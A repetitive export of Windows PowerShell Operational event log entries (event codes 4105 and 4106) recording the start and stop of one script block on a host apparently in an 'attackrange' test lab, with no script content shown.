Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472979
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472978
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472977
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472976
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472975
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472974
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472973
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472972
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472971
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472970
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472969
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472968
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472967
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472966
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472965
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472964
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472963
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472962
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472961
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472960
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472959
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472958
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472957
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472956
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472955
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472954
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472953
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472952
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472951
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472950
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472949
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472948
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472947
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472946
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472945
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472944
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472943
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472942
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472941
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472940
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472939
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472938
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472936
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472935
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472934
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472933
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472932
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472931
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472930
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472929
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472928
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472927
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472926
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
